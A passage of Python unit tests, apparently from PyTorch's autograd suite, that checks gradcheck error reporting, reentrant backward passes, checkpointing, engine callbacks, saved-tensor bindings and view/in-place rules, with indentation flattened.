self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
